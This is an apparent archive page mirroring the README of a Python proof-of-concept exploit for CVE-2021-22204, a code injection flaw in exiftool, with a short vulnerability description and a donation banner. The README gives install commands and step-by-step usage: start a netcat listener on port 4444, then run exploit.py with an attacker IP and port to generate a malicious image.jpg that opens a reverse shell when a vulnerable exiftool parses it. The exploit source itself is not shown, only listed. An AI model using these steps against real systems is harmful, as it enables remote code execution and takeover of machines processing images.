Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%

CVE-2021-22204 PoC — exiftool 代码注入漏洞

Source
Associated Vulnerability
Title:exiftool 代码注入漏洞 (CVE-2021-22204)
Description:exiftool是一个应用软件。使元数据更易于访问。 ExifTool 7.44版本及之前版本存在代码注入漏洞,该漏洞允许在解析恶意图像时任意执行代码。
Description
exiftool exploit
Readme
# CVE-2021-22204-exiftool
Python exploit for the CVE-2021-22204 vulnerability in Exiftool.
# Video tutorial
   ## Youtube 
        404 notfound
## Requirements 
    python3 python3-pip djvulibre-bin exiftool

# Install requirements 

   ## Debian
        apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
    
   ## Ubuntu
        apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
    
   ## Arch Linux
        pacman -S djvulibre libimage-exiftool-perl python python-pip
    
   ## Kali Linux
        apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
    
   ## Fedora
        dnf install djvulibre libimage-exiftool-perl python-minimal python-pip
    
   ## OS X
        brew install djvulibre exiftool python
    
   ## Raspbian
        apt-get install djvulibre-bin libimage-exiftool-perl python-minimal python-pip
 
# How to run:
   ## Install python requirements
        sudo pip install -r requirements.txt

   ## start reverse shell with natcat
        nc -nvlp 4444

   ## Give execute permission 
        chmod +x exploit.py
   ## Run program
        python3 exploit.py {Your IP add adress} {Your Listening port} 
        
   ### OR 
        
        ./exploit.py {Your IP add adress} {Your Listening port}
   ## Example
    
        python3 exploit.py 192.168.0.1 4444
        
   ### OR 
        
        ./exploit.py 192.168.0.1 4444
   ## Output file name is 
        image.jpg
        
# About the vulnerability

The CVE-2021-22204 was discovered and reported by William Bowling. (@wcbowling)

This exploit was made by studying the exiftool patch after the CVE was already reported.

And the image.jpg will trigger the vulnerability when opened with a vulnerable exiftool.
File Snapshot

[4.0K] /data/pocs/7163951b5b882f164392f173ef0cb92c746123f5 ├── [ 69K] exploit.py ├── [1.7K] README.md └── [ 58] requirements.txt 0 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.